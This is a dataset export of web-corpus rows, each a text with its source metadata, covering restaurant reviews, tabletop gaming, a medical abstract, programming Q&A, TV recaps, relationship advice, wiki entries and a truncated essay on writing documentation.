text
stringlengths
1
3.78M
meta
dict
The Sweet Service Award goes to Woolworths in the Waterfront, and its Manager Warren Sitzer. I received poor service in looking to buy wine glasses in the Homeware department, so poor that I went to buy some at @Home instead. At Country Road inside the Woolworths store I wanted to pay for a top, but there was no staff member to be seen. I wanted to relate both service issues to a manager, and Warren listened, apologised with charm, and brought me some roses. He said he remembered my son and I shopping at the Paarl Mall branch more than ten years ago, when we lived in Franschhoek. He also shared the amazing developments lying ahead for this Waterfront branch. He invited me to chat to him at any time that I experience any problems at this branch. Wow! Last week I invited my friends Clint and Llewellyn Lambert (GM of the Franschhoek Boutique Hotel, and influential blogger at Hospitality Hedonist) to join me for dinner at Le Petit Manoir in Franschhoek, which opened in July. Having had more than enough time to settle in, it was a severely (and costly) experience, of a completely dysfunctional restaurant. I apologise for the longer than average Review, summarizing my experiences with Chef Kevin Grobler’s cooking since 2015. (more…) It has been deduced from Instagram posts advertising for new staff by The Test Kitchen Chef Ryan Cole that Chef Luke Dale-Roberts is to open his fourth restaurant in Cape Town, called Salsify @ The Roundhouse, to be located in The Roundhouse in Camps Bay. (more…) The Sweet Service Award goes to the Twelve Apostles Hotel, and its F & B Manager Hilton Ruch. On my way home from dancing at Constantia Nek recently, I stopped by at their Café for a dry cappuccino. Not expecting Hilton to be at work after 22h00, I asked one of the staff to pass on my regards to him. She told me he was still at work, and called him. He chatted, and told me about their new Vegan High Tea, a first in Cape Town it would seem, as well as other news. The dry cappuccino was perfectly made, and they have marshmallows too, a weakness. When I requested the bill, I was told that Hilton had taken care of it,(more…) Ever since I reviewed Chef Bertus Basson’s Spek & Bone dive of a restaurant in Stellenbosch in July last year, Basson has been on a mission to discredit me as a reviewer, not being man-enough to accept my honest feedback. Last week I popped in at his latest eatery, De Vrije Burger, a hamburger and ice cream joint, on Plein Street in Stellenbosch, the take-away outlet being far below the standard of his Eat Out Top 10 award stature! One wonders why he is scraping the barrel with cheap and nasty restaurants, when he started off with the top level Top 10 Overture restaurant, his first! Each new restaurant, of his five restaurants, is one level below the previously opened one in terms of quality! (more…) On a day that was already going well, it was hard to imagine that it could get even better with an invitation to attend the 2017 launch of the #HQFineWining (what a clever hashtag) series of food and wine pairing dinners. Graham Beck bubblies were served and we were told that bubbly pairs well with all kinds of foods, including the well-known HQ steak! (more…) Yesterday I completed my Gourmet Tour of France, eating at the 50th restaurant on the World’s 50 Best Restaurant list, being Septime in Paris. It has one Michelin star, and has held it for the past four years. Despite being understated and hidden in its location, it offers world-class cuisine served by an enthusiastic team. (more…) Today I depart on a two-week eating tour of France, continuing my World’s 50 Best Restaurant journey I began in New York and London in July last year. There is no more exciting start to my culinary trip than dinner at JAN restaurant in Nice on Wednesday, given that it has just been awarded the 2017 Michelin one-star rating. In February 2016 owner Jan-Hendrik van Der Westhuizen did our country proud, in becoming the first South African chef to own a Michelin-star restaurant. (more…) It is rare to see a restaurant serve only two options of food, and its name Burger&Lobster is true to reflecting this new restaurant, which opened a month ago in a heritage building on Bree Street. (more…) Yesterday I had the honour to get to know Koekedoor judge Mari-Louis Guy better over a 3½ hour period, first visiting the Cakebread Studio which she owns with her brother and business partner Callie Maritz. The get-together was crowned with a visit to the One & Only Cape Town, where the three of us indulged in what is my favorite Afternoon Tea in Cape Town. (more…)
{ "pile_set_name": "Pile-CC" }
Pages On the Superiority of Descending AC Ask anyone, and they can tell you what's not good about descending AC. It's pretty simple. Subtraction. Subtraction is so much harder than addition. How much of a terrible effort it must be to take one number and- Oh, wait. It's not that hard. In all seriousness, the ability to do short form addition inside your head is much easier then to do a subtractive operation. If you've ever been asked to do serial sevens, then you're aware of that. It clearly is a simpler operation to simply have the entire process be additive. So what's the problem? Why not just switch over to the attack bonus? What is so great about ThAC0? They are in fact an identical operation (To hit AC 0-AC is exactly the same equation as Attack Bonus, err, mathematically if X=d20 roll and To hit AC 0 = 20-Attack bonus, then, Attack Bonus + X > AC is the same as X > (20 - Attack Bonus) - AC. tl;dr math)) Upper bounds. There is no -11 AC in Dungeons and Dragons. (Well, I'm sure in some supplement somewhere, but I'm pretty sure the intent is to have -10 AC be the absolute best armor class). This upper bound meant that the game was constrained to a human level. No matter how many bonuses you had, or how good you were, the best that you could be was -10. And there were many many difficulties in reaching such a high Armor Class. First, the best suit of armor and the best shield in the core game (AD&D1) only put you down to 2. And then to find magical enhancements on that armor of any substance was quite rare. It is possible to get both up to +5 (in what I'm sure were some high powered games) and have both a shield and armor made from "adamantite alloyed steel" Welcome to armor class -8. Can't get any help from a ring of protection (due to wearing magical armor), so you'd have to have a bit of dexterity to push it higher. I understand it is even more limiting in the earlier versions of the game. I'm assuming we're all familiar with what happens with the d20 system, when the values start to be larger than the dice ranges. And the fact is, with all the different kinds of stacking bonuses, I rarely have a pathfinder character that isn't trying to get his armor class into the 40's. (that's -20 AC for those of you playing along at home. That was a summoner, the party tanks were better at it. Pretty possible with armor, buffs and an enchanter in the party. It is another thing that indicates the grounded nature of the game. You were always playing people. By 11th level, my flying, invisible, shadow walking, giant pet having, summoner often felt more than human. (However I should point out, that in contrast to 3.5, this was not outside the power level of the non-spellcasters. The barbarian was quite functional and interesting - sticky. Highly entertaining to watch him follow anyone who tried to run and smack them down. Much better then 3.5) You could tweak and power game and min/max all you wanted. You'd hit the limit, and then the rest didn't matter. It is exceptionally hard to have a bad first edition character, no matter the stats. Discussing this with a friend, he show me how he could "build" a poorly functional fighter. It involved taking proficiencies in a lot of strange weapons. (I specialize in rope! and chair legs! oooooo. scary -_- ) It's another reason that all those little fiddly bits aren't really necessary. Descending AC, though non-intuitive and difficult for newcomers to grasp, limited the game in positive ways. It kept the focus on where it should be - the play between the players and the Dungeon Master. I want to say thanks for all the kind comments, and hello to all my new followers. Posting has been light this last week, because I spent most of last week preparing for the traps release. Know that I'm working on an old school Alchemy & Poisons Supplement that I hope to have out next month. Also, if anyone has any ideas for these things, or questions about where you can use them, please contact me at the e-mail address underneath the picture of the monkey! 5 comments: Eh, that statement about building a wacky fighter is taken pretty far out of context, but oh well. (I believe the original discussion was about whether or not a characters build made any difference at all in 1st edition/Hackmaster, and I was just pointing out that it _could_ make a difference, even if it generally wasn't likely to.) Would you mind terribly removing my (mildly mispelled) name though? Anonymous attribution is one thing, but putting words in my mouth by name/nick is a tad much. Shouldn't this be titled 'Why a cap to AC is important?' Nothing in the article had anything to do with explaining why it is better to do more math than is needed, only that it is beneficial to have a stopping point to how good an armor class can be. I certainly agree with the point you are making, and I have used ascending AC in my games for several years now. It seems though that the essence of this has nothing to do with ascending vs. descending, but with 3e vs 0e or 1e. A few random comments... subtraction isn't really needed if each character sheet has the ACs listed on a bar along with the number needed to hit. Also, from stories I have heard told the original idea (Dave Arneson's) was that the negative ACs represent things like ghosts, etc. where you NEED a weapon with an equivalent magical "+" in order to hit them. That is nice and flavorful and makes some sense out of the negative numbers (negative plane energy!) I agree completely about the newer games where the numbers never seem to hit a maximum, and how that gives no sense of scale other than neverending superhuman escalation of abilities. There's no yardstick to judge by. The same applies to ability scores, by the way!
{ "pile_set_name": "Pile-CC" }
Reliability of ultrasound in diagnosis of intracerebral hemorrhage and posthemorrhagic hydrocephalus: comparison with computed tomography. Subependymal and intraventricular hemorrhage are frequent complications of the high risk preterm infant. It has been stated recently that ultrasound may be used to diagnose intraventricular hemorrhage. A comparative prospective study of ultrasound scan (US) with a commercially available B-mode real time linear array US machine and the computed tomography (CT) scan was undertaken to determine the accuracy of US in diagnosing the presence and quantity of subependymal and intraventricular hemorrhage and in following infants with hemorrhage for the development of progressive hydrocephalus. There were 101 patients followed with serial US examination for evidence of subependymal and/or intraventricular hemorrhage. CT correlation was obtained on each patient. The US examination correlated with the CT scan in 77 of these 101 patients. The demonstration of hydrocephalus by US in eight infants with postthemorrhagic hydrocephalus was reliable, and the correlation with CT scan was excellent.
{ "pile_set_name": "PubMed Abstracts" }
10 Quizzes for Teachers to Take for National Teacher Day Are you a teacher? Have some fun with these quizzes! Happy National Teacher’s Day! Teachers are a big part of the Blogthings community. Many teachers use Blogthings in the classroom, which I think is super cool 🙂 Since today is all about celebrating teachers, I decided to include some quizzes I thought teachers may enjoy taking. Whether you’re a current teacher, former teacher, aspiring teacher, or fan of teachers, I think you’ll enjoy these quizzes. Celebrate National Teacher’s Day with me by taking these quizzes: What Grade Should You Teach? – What grade is best suited to your personality and talents? Take this quiz to find out what grade of school you should be teaching! This quiz is based on elementary school grades, so if you get fifth grade, there’s a chance that you’d be suited for middle or high school as well. What Elementary School Subject Are You? – Let’s be honest… I wrote this quiz because I love every elementary school subject. Do you agree? Whether you’re a teacher or someone just missing elementary school, this quiz will let you know what elementary school subject you are most talented at. What After School Snack Are You? – Sometimes the best part of the school day is the after school snack! After school snacks aren’t just for kids… teachers have to eat too! Take this quiz to learn which after school snack you should be eating. How’s Your Vocabulary? – No matter what subject you’re teaching, it’s important for all teachers to have a big vocabulary. Do you make the grade? Take this quiz to see how your vocabulary stacks up. What’s Your Learning Style? – While teachers may spend a lot of time thinking about learning styles in their classroom, teachers are always learning as well. Take this quiz to figure out what kind of learner you are. Once you know your own learning style, you an harness it to increase your learning (and therefore teaching) power. Who Were You In High School? – Teachers get to observe students so much that they naturally start thinking about their own student experience. What were you like in high school? Sometimes it’s hard to remember or get an accurate picture of how people perceived us, and this quiz helps with that. Take this quiz to see what you were like in school. Could You Pass 8th Grade Math? – Math can be a vexing subject for all of us (well, except math teachers!). How much of the math you learned in school do you actually remember? Take this quiz to see if you could pass 8th grade math… or if you need to hit the books! What Does Your Least Favorite School Subject Say About You? – While teachers may not want to admit to their students that they had a least favorite school subject, we all have one. Take this quiz to find out what your least favorite school subject reveals about you. And don’t worry! Your secret is safe with me! The Classroom Test – Teachers spend most of their time on one side of the classroom, so I thought it would be fun to imagine the roles reversed. This scenario quiz puts you as the student inside a classroom. Say how you would react to certain situations, and you’ll get a customized personality result. How Liberal Or Conservative Are You? – As I mentioned earlier, teachers love to share Blogthings quizzes with their classrooms! I think that’s so cool. What a great way to mix technology and learning. This is the #1 quiz that teachers like to share with their classes. Give it a go, and see if you know a young person who may like to take it as well.
{ "pile_set_name": "Pile-CC" }
Q: Infinite scrolling on extJS local data store is it possible to have infinte scrolling in a extJS (4.1) grid, whose data-store is loaded manually? myStore = Ext.create('Ext.data.Store', { fields:givenStoreFields, data: [[]], }); myGrid = Ext.create('Ext.grid.Panel', { store: myStore, columns: givenColumns, }); In my case I fetch data from the server, the data is tweaked, and then loaded into the store manually. myStore.loadData(fetchedAndTweaked); Since fetchedAndTweaked contains many rows, rendering is very slow, and slows the entire browser. Therefore I want to add parameters to myGryd and myStore to have "infinite" scrolling (on the data-set fetchedAndTweaked). However: All examples I find, the dataStore has some proxy/reader etc. //Thanks A: You can, if you use buffered: true config on your store as described in the Ext JS 4.1.3 docs:. buffered : Boolean Allows the Store to prefetch and cache in a page cache, pages of Records, and to then satisfy loading requirements from this page cache. To use buffered Stores, initiate the process by loading the first page. The number of rows rendered are determined automatically, and the range of pages needed to keep the cache primed for scrolling is requested and cached. Example: myStore.loadPage(1); // Load page 1 A PagingScroller is instantiated which will monitor the scrolling in the grid, and refresh the view's rows from the page cache as needed. It will also pull new data into the page cache when scrolling of the view draws upon data near either end of the prefetched data. The margins which trigger view refreshing from the prefetched data are Ext.grid.PagingScroller.numFromEdge, Ext.grid.PagingScroller.leadingBufferZone and Ext.grid.PagingScroller.trailingBufferZone. The margins which trigger loading more data into the page cache are, leadingBufferZone and trailingBufferZone. By default, only 5 pages of data are cached in the page cache, with pages "scrolling" out of the buffer as the view moves down through the dataset. Setting this value to zero means that no pages are ever scrolled out of the page cache, and that eventually the whole dataset may become present in the page cache. This is sometimes desirable as long as datasets do not reach astronomical proportions. Selection state may be maintained across page boundaries by configuring the SelectionModel not to discard records from its collection when those Records cycle out of the Store's primary collection. This is done by configuring the SelectionModel like this: selModel: { pruneRemoved: false } Defaults to: false Available since: 4.0.0 As noted above, you will also have to set thepageSize config on the store to what you want it. A word of warning: you don't find any examples of local stores with infinite scrolling because the number of records to make infinite scrolling viable exceeds the number of records which you should reasonably keep in a local store. In other words the rendering is not the only thing that slows down the browser, it's also the amount of data you are trying to process locally. If you feel you need to implement infinite scrolling it's probably time to convert to a remotely loaded data store. A: After an upgrade I found out that this i much easier in extJS 4.2(beta). The infinite scrolling is detached from the datastore. IE it does not matter what type of datastore you use. Also sorting is working as you want it. store = Ext.create('Ext.data.SimpleStore',{ autoLoad: true, pageSize:100, data:[ [] ], } Ext.require('Ext.grid.plugin.BufferedRenderer') var grid = Ext.create('Ext.grid. plugins: 'bufferedrenderer', store : store, } //I load matrix data directly in the store for speed store.loadRawData(matrixData); The application is so much faster now.
{ "pile_set_name": "StackExchange" }
District of Columbia Chat | District of Columbia Chat Rooms | District of Columbia Chat Room | District of Columbia Chatroom | District of Columbia Chatrooms | District of Columbia Free Chat | DC Chat Rooms Break out of the old chatrooms and meet someone in District of Columbia with our 100% Free video and audio chat. Chat Society is absolutely free and registration is not required. Click a regional city within District of Columbia from the list below or scroll down to pick a chat room directly.
{ "pile_set_name": "Pile-CC" }
Eugene has a big evening planned. Alternate gag: Eugene switches the cartridges out and begins playing Sinistar. When the Sinistar says “RUN, COWARD!” Eugene hangs his head and says, “That is an accurate assessment.” I would prefer to just leave this here and let it speak for itself, but regulations state that a newspost must contain at least 100 words to be properly picked up by search engines, so to avoid spoilers, the remainder is below the video. No peeking. Just watch this: Out of all the Walking Dead […] Should the Group Forgive Eugene? First off, I have to admit this could be a bit of a moot point if Eugene dies from that beating Abraham gave him when he found out that his entire reason for living was a lie. Eugene looked alive to me, but Executive Producer Gale Anne Hurd wouldn’t […] Rate The Walking Dead Episode 505 ‘Self Help’ This episode starts with 10 minutes of Maggie crying, worrying about Beth and rationalizing her decision to go along with Glenn on a possible fool’s errand to Washington, D.C. when Beth might possibly still be a live and could be rescued. Kidding. None of that happens. […] Is Eugene Telling the Truth? We’ve got your sneak peeks for the upcoming episode, plus a big question. Does Eugene know what he’s talking about? A bunch of our characters have loaded on a church bus to travel to Washington, D.C. to find out, and we’ll follow them in Sunday’s episode. He’s certainly able […] Before you click over to the full article, there is one major, no kidding comic spoiler in it. Who knows if it’ll be the same in the show, but forewarned. So we’ve had a little time to get to know Eugene, man of mulleted mystery. We know he says he knows the cause of the […] AMC’s The Walking Dead returns tonight with “Claimed”, the eleventh episode of season four. The episode starts with Tara and Glenn in the back of Sgt. Abraham Ford’s truck. Glenn is still unconscious and Tara is seen writing notes on her hand of key areas they have passed. They come across a small roadblock and […] If your’e the kind of person who likes to go into the show as pure as the driven snow, be warned that their are some light spoilerish hints in the material in this article. Lots of early looks out there for this Sunday’s upcoming The Walking Dead episode. In addition the moment with Rick and […] So now that we’ve seen the introduction of Abraham Ford with last night’s The Walking Dead episode, “Inmates,” let’s see what actor Michael Cudlitz has to say about his character. “He’s not to be f—ed with. He will kill you,” Cudlitz said. Ooohkay. Duly noted. Cudlitz talked at length about his character in TV Guide […]
{ "pile_set_name": "Pile-CC" }
Without discussing these concerns, they may find themselves in a situation where it’s too late to change something that one or both partners don’t like. 1) “Will we change with marriage?” The most common answer? Yes. Of course you and your partner will change with marriage. The more important question is how your relationship will change after marriage. With two people come two different sets of notions and ideas about marriage, whether this includes responsibilities, gender roles, your sex life, and so on. In one study, it was found that major personality shifts generally occur after marriage. It’s important that you and your partner are on the same page when it comes to how you will evolve after your wedding day. 2) “What is cheating?” This may seem obvious, but the definition of “cheating” isn’t as universal as we would like to think. Some people consider it cheating when you are touching someone on the shoulder, or sharing a personal secret with another person. Others might not think of it as cheating until their partner is in bed with another person. Remember this: your expectations and thoughts on fidelity may not be the same as your partner’s, and if that’s important to you, then it’s something you need to clear up before you disappoint your partner (or the other way around). There are many cases of emotional affairs, where a partner invests themselves emotionally in another person. If this makes you uncomfortable, discuss it with your partner immediately. 3) “Do you have debt? If so, how much?” Many young couples ultimately refuse to discuss money, thinking that it might dampen the “love” in their relationship. But at some point it is crucial to grow up and be realistic: a relationship is more than just your emotions; it’s also about spending your life with another person, and that means sharing costs and expenses. Imagine getting married to someone you love, only to find out a week later that they are $50,000 in debt. Not a great picture, right? Sit down with your partner and talk about debt. Whether you have any, and how much you are willing to take on. 4) “Do you want kids?” To some, kids are a basic component of life. They were raised with the belief that kids are a normal and expected part of any married couple’s life. To others, kids may simply be an option (or not an option at all). You may meet the love of your life, but if you avoid the question about kids, you and your partner may one day be in for a big surprise. How terrible would it be to share a life with someone, only to find out that you two are incompatible because of kids? Don’t let heartbreak or resentment become an inevitability. 5) “How much personal time and space do we need?” The biggest change that we experience when we jump into a long-term and committed relationship is the change to our personal time and space. All of a sudden, even your most personal moments now have another person in it. Even if that person is someone you deeply love and care about, you may not be ready to share all your time and space with another person. If you want to be a good girlfriend or boyfriend, confront these questions and ask your partner how much time and space they truly need to be themselves. Failing to “ask less” from your marriage can weaken it, according to one psychologist from Northwestern University. 6) “Who will do the chores?” A 2007 poll from Pew Research found that one of the most important factors in predicting a successful marriage is how much the couple shares household chores. Unfortunately, many relationships fail to grasp this importance, with women still carrying the majority of the work around the home. By sitting down with your partner and evenly dividing or assigning the chores, this eases tension and saves time from fighting about housework. 7) “What do you think about divorce?” It’s a dirty question that many in relationships would never want to consider, but it’s one that provides valuable insight into your partner. Whether or not you are planning to have a divorce, you need to know what your partner thinks about it. The simple fact that you know that your relationship can have an end, with a clean divorce possible at the end of the road, provides a freedom that can keep both partners mentally healthy in their relationship. For more mindful and practical self-improvement advice on your Facebook newsfeed, like Hack Spirit on Facebook: A quick message from Lachlan Brown, the founder of Hack Spirit In 2018, the third year of Hack Spirit, I poured thousands of hours and considerable resources into creating these articles. It's a labor of love and remains free thanks to your patronage. If you found any value in these articles, please consider supporting what I do with a donation. Your support is what helps me to continue creating more Hack Spirit articles. To make a donation, select the amount and click the "donate" button below. I’m Lachlan Brown, the founder and editor of Hack Spirit. I love writing practical articles that help others live a more mindful and better life. I have a graduate degree in Psychology and I’ve spent the last 6 years reading and studying all I can about human psychology and practical ways to hack our mindsets. If you to want to get in touch with me, hit me up on Twitter or Facebook.
{ "pile_set_name": "Pile-CC" }
Q: How to pass different config for each instance of a browser created by protractor in sharded config enabled.? Iam passing the login details of a tested website using browser.params in protractor login suite. But the problem is that my web application has a restriction for single login for a user account. Hence running tests in multicapablities in firefox and chrome simultaneously fails.Since only one browser user session can exists at a time.Please provide a work around to solve this. It should be nice to pass different login params to firefox and chrome inside multicapabilities. is it possible. A: The browser instance can be fetched using browser.getProcessedConfig and the login credentials can be assigned accordingly in on-prepare of Protractor.conf.js Refer browser.getProcessedConfig API doc onPrepare: function() { browser.getProcessedConfig().then(function(config){ switch(config.capabilities.browserName) { case 'chrome': //logic for chrome browser.params.username = 'blahblah' break; case 'firefox': browser.params.username = 'blahblah2' break; default: browser.params.username = 'blahblah3' break; } }) },
{ "pile_set_name": "StackExchange" }
Recommended Games This week's pound-for-pound fighter rankings were released by the UFC. After an impressive outing against Cat Zingano, Ronda Rousey still remains in the rankings as the only female. Check out the rankings to see where she ranks among the other fighters. Rankings are generated by a voting panel made… Sometimes skiers and snowboarders can take themselves just a little bit too seriously. Well, not here they don't – it’s against the rules. First you dress up in the most creative costume you can find, or you make yourself a crazy little vehicle. Then you slide down the slope as fast as you can and… LOS ANGELES – It used to be that Ronda Rousey needed a minute to finish her fights. Now, she's getting two of them done in half of that time. The most dominant fighter in the world continued her mind-boggling run of destruction Saturday, submitting previously unbeaten top contender Cat Zingano in… The coveted 2015 Rivals100 Five-Star Challenge will be held June 5-7 at M&T Bank Stadium in Baltimore, Maryland. The top 100 high school football players are invited to the event for a two-day competition. Here are some of the top athletes that have been invited so far. Thousands of dead fish have been found on the edge of Guanabara Bay, which will be the site of the Rio 2016 Olympic Games sailing venue. The polluted bay receives a majority of the city's raw sewage and officials have recently admitted their cleanup goals won't be met in time for the Olympics.… The final first legs of the round of 16 pit Arsenal against Monaco and Bayer Leverkusen vs. Atletico Madrid. Bayer Leverkusen and Atletico Madrid go head to head at BayArenain. Hakan Calhanoglu's goal gave Bayer Leverkusen was enough to seal the 1-0 victory over Atletico Madrid. The final first legs of the round of 16 pit Arsenal against Monaco and Bayer Leverkusen vs. Atletico Madrid. Despite going into the match as favorites, Arsenal failed to perform. Monaco beat Arsenal 3-1. Aaron Hernandez, 25, is charged with killing semiprofessional football player Odin Lloyd, 27, in June 2013. Lloyd was dating the sister of Hernandez's fiancee. His bullet-riddled body was found in an industrial park in North Attleborough, not far from Hernandez's home. He has pleaded not guilty. —… According to Fanatics.com, the world’s leading online retailer of officially licensed sports merchandise, the top-5 current MLB players in regards to merchandise sales are all from California teams. These numbers have been collected from January 1 through February 25. Check out the full list of… Jason Dufner has a few claims to fame in his young professional golf career. He's won the PGA Championship , notching a major in his belt, and he's become his own internet meme with "Dufnering ." But he may have a third accomplishment to add to the list: Transforming his body. Thanks to a… Whichever colleges are already recruiting 10-year-old LeBron James Jr. might be wise to back off for a few more years. It isn't making his father happy. The elder LeBron told reporters in Detroit at Cavaliers shoot-around Tuesday that colleges have already begun to send recruiting letters and… The Los Angeles Dodgers have too many outfielders and Andre Ethier might not have a spot on the field this season. The outfielder is still guaranteed another $56 million over the next three seasons. With one of the Dodgers highest-paid players possibly facing a season on the bench, we’ve tracked… Rankings are generated by a voting panel made up of media members. The media members are asked to vote for who they feel are the top fighters in the UFC by weight-class and pound-for-pound. A fighter is only eligible to be voted on if they are in active status in the UFC. The champion and interim… ATHENS, Greece (AP) — Greece's top soccer league was suspended indefinitely Wednesday because of continued violence at matches, a government official with knowledge of the decision told The Associated Press. The action followed weekend violence at a league match between rivals Olympiakos and…
{ "pile_set_name": "Pile-CC" }
For We Are Many Foreword For We Are Many is the direct sequel to The Darkest Night, and indeed begins about twenty minutes after the Epilogue of that first work. This piece is, in essence, a Mass Effect 2 redux, with some canonical items changed around to incorporate a slightly altered plotline. You'll see many references to things from The Darkest Night, as I intend for my works to not only stand alone, but also all be parts of one large, overarching series, utilizing the same characters and plot developments. Ergo, if you haven't read The Darkest Night, I'd start there. =) Dedication: This work is dedicated in equal measure to four people. In no specific order, they are: Calinstel Tairis Deamhan Andrio Rose Tinted Contact Lenses Without their wonderful contributions to this site, my work wouldn't exist. I've drawn inspiration from Calinstel's rich quarian lore and language, as well as Rose's ability to completely invade a character's mind, and describe in excellent detail, and so few words, exactly what that character is thinking, how they're reacting to the situation at hand. I've drawn from Tairis' ability to broaden the scope of a widely known but not terribly fleshed out side-plot, and Andrio's capability to masterfully trace a character arc over a huge period of time, while at the same time keeping that character ever someone the reader can relate to. These four were my main inspiration for starting work on The Darkest Night, but every so often I find an author who can at the very least show me a side of this wonderful universe I haven't seen before. If you're wondering whether or not to start writing, just start writing, and see what happens. The worst you could do is waste a couple hours trying to reinvent the wheel. The best you could do...well I personally feel that's listed above, within the works of the people I've mentioned. (=D) Right, then. Enough raving about people who write better than I do (=D). To all of those joining me from The Darkest Night, welcome back! I hope the "break" wasn't too much of a strain (=P). And to anyone just joining, welcome as well, I feel you're in for a real treat! As of the time of writing this Foreword (1:21am U.S. EST 10/24/11), I still have a good bit of Java Programming homework left to finish off. Expect the Prologue up probably around this time tomorrow. Can you live for 24 hours? I know it'll be rough for me! Oh and for anyone concerned, expect the same pace as before, with about four times the content to write. (=D) Let's get this party started. Happy Reading! ~venomRED
{ "pile_set_name": "OpenWebText2" }
# will_pop_scope_demo 检测页面是否被弹出的demo。 收录于MTechViral的youtube视频https://www.youtube.com/watch?v=fYBCzgBRkb4&list=PLR2qQy0Zxs_Wot7YfLeeKdMlJ9838C_w0&index=2 ## 样例 ![](../../../image/will_pop.png) ![](../../../image/will_pop_form.png) ## Getting Started For help getting started with Flutter, view our online [documentation](https://flutter.io/).
{ "pile_set_name": "Github" }
Dr. Kendra Coulter My scholarship focuses on how to improve jobs and work-lives, and foster solidaristic, sustainable societies. Situated at the intersections of nature and labour, my current research revolves around the largely under-explored area of animal work; that is, the work done with, by, and for animals. I am beginning a new project on how to conceptualize, expand, and create what I call humane jobs: jobs that are good for people and for animals. Trained as an anthropologist, I continue to be interested in gendered and intersectional strategies for improving retail work and eliminating poverty.
{ "pile_set_name": "Pile-CC" }
using System.Collections.Generic; using Volo.Abp.AspNetCore.Mvc.UI.Bundling; namespace Volo.CmsKit.Public.Web.Pages.CmsKit.Shared.Components.ReactionSelection { public class ReactionSelectionStyleBundleContributor : BundleContributor { public override void ConfigureBundle(BundleConfigurationContext context) { context.Files.AddIfNotContains("/Pages/CmsKit/Shared/Components/ReactionSelection/default.css"); } } }
{ "pile_set_name": "Github" }
LXE MX8 LXEMX8 Hand Held Computer The LXE MX8 measures 7.6 in. long and weighs less than 13 ounces with battery and several options. The bright touchscreen and backlit keys improve visibility in less-than-optimum lighting conditions. Scanning options include standard-range laser scanners and 1D and 2D imagers. The MX8 mobile computer comes standard with an IEEE 802.11b/g radio and Bluetooth technology, and runs on Windows CE 5.0 Professional. It also features exceptional battery performance, testing at 10+ hours of intensive operation on a single charge.
{ "pile_set_name": "Pile-CC" }
Tokimeki Tokimeki is the romanization of the Japanese term ときめき which can mean excitement or heartbeat. It can refer to: Tokimeki Tonight, a manga/anime series that began in 1982 Tokimeki Alice, a manga by Hideo Azuma that ran from 1985 to 2006 Nakayama Miho no Tokimeki High School, a 1987 dating sim Tokimeki Memorial, the first of a dating sim series that began in 1994 Tokimeki Couple, a 1996 manga series by Mariko Kubota produced in Manga Life Sailor Moon Sailor Stars Tokimeki Party, a 1997 release by Sega Pico in list of party video games Tokimeki Check-in!, a dating sim eroge released January 1999 Tokimeki, a December 1999 comedic song by produced by Key Party Records and released by Enamell Records Tokimeki Momoiro High School, a May 2002 manga series by Chiharu Sasano (also in Manga Life) , a December 2002 retelling of Tokimeki Tonight Tokimeki DREAMing!!!, a 2008 song in "Shokugyō: Idol" Tokimeki no Rumba, an August 2009 single released by singer Kiyoshi Hikawa Kaitō Tenshi Twin Angel: Tokimeki Paradise!!, a 2011 anime adaptation of a 2007 manga Tokimeki Crisis is a video game in the series Kamen Rider Ex-Aid Tokimeki/Tonari no Onna, is a 2015 double A-side single by Chatmonchy
{ "pile_set_name": "Wikipedia (en)" }
Aroor Raja Aroor Venkatachari Srinivasaraghavan (AVS) Raja (born March 23, 1939 in Aroor, India) is one of the founders of Shriram Group of companies. Biography Raja worked for Indian Railway before becoming co-founder of the Shriram along with R. Thyagrajan. His "Silver Medallion campaign" took the small company to national recognition. In 1985 Raja convinced all the part-time Chief Regional Managers of UTI (Unit Trust of India - SOUTH )to become the regional managers for Shriram Group to develop and market various financial instruments of the group. Raja works with the local community holding the posts of Managing trustee & Publisher of Amudhasurabi (a 63 years old Tamil literary magazine), founder general Secretary of Towers Club (1989 in Anna Nagar, Chennai), President of Kartik Fine Arts, Founder chairman of Probus Club (affiliated to Rotary Club of Anna Nagar, 1992) and a member of the Rotary Club of Anna Nagar . References Category:1939 births Category:Living people Category:Businesspeople from Tamil Nadu
{ "pile_set_name": "Wikipedia (en)" }
I’ve been writing developer documentation for 20 years now, 11 of those years at Mozilla. For most of those years, documentation work was largely unmanaged. That is to say, we had management, and we had goals, but how we reached those goals was entirely up to us. This worked well for me in particular. My brain is like a simple maze bot in some respects, following all the left turns until it reaches a dead end, then backing up to where it made the last turn and taking the next path to the right, and repeating until the goal has been reached. This is how I wrote for a good 14 or 15 years of my career. I’d start writing about a topic, linking to APIs, functions, other guides and tutorials, and so forth along the way—whether they already existed or not. Then I’d go back through the page and click the first link on the page I just created, and I’d make sure that that page was solid. Any material on that page that needed to be fixed for my new work to be 100% understood, I’d update. If there were any broken links, I’d fix them, creating and writing new pages as needed, and so forth. How my mind wants to do it Let’s imagine that the standards gurus have spoken and have decided to add to a new <dial> element to HTML, providing support for creating knobs and speedometer-style feedback displays. My job is to document this element. I start by creating the main article in the HTML reference for <dial >, and I write that material, starting with a summary (which may include references to <progress> , <input> , and other elements and pages). It may also include links to articles I plan to create, such as “Using dial elements” and “Displaying information in HTML” as well as articles on forms. As I continue, I may wind up with links to subpages which need to be created; I’ll also wind up with a link to the documentation for the HTMLDialElement interface, which obviously hasn’t been written yet. I also will have links to subpages of that, as well as perhaps for other elements’ attributes and methods. Having finished the document for <dial> , I save it, review it and clean it up, then I start following all the links on the page. Any links that take me to a page that needs to be written, I write it. Any links that take me to a page that needs content added because of the new element, I expand them. Any links that take me to a page that is just horribly unusably bad, I update or rewrite as needed. And I continue to follow those left-hand turns, writing or updating article after article, until eventually I wind up back where I started. If one of those pages is missing an example, odds are good it’ll be hard to resist creating one, although if it will take more than a few minutes, this is where I’m likely to reluctantly flag it for someone else to do later, unless it’s really interesting and I am just that intrigued. By the time I’m done documenting <dial> , I may also have updated badly out of date documentation for three other elements and their interfaces, written pages about how to decide on the best way to represent your data, added documentation for another undocumented element that has nothing to do with anything but it was a dead link I saw along the way, updated another element’s documentation because that page was where I happened to go to look at the correct way to structure something, and I saw it had layout problems… You get the idea. How I have to do it now Unfortunately, I can’t realistically do that anymore. We have adopted a system of sprints with planned work for each sprint. Failing to complete the work in the expected amount of time tends to get you dirty looks from more and more people the longer it goes on. Even though I’m getting a ton accomplished, it doesn’t count if it’s not on the sprint plan. So I try to force myself to work on only the stuff directly related to the sprint we’re doing. But sometimes the line is hard to find. If I add documentation for an interface, but the documentation for its parent interface is terrible, it seems to me that updating that parent interface is a fairly obvious part of my job for the sprint. But it wasn’t budgeted into the time available, so if I do it, I’m not going to finish in time. The conundrum That leaves me in a bind: do strictly what I’m supposed to do, leaving behind docs that are only partly usable, or follow at least some of those links into pages that need help before the new content is truly usable and “complete,” but risk missing my expected schedule. I almost always choose the latter, going in knowing I’m going to be late because of it. I try to control my tendency to keep making left turns, but sometimes I lose 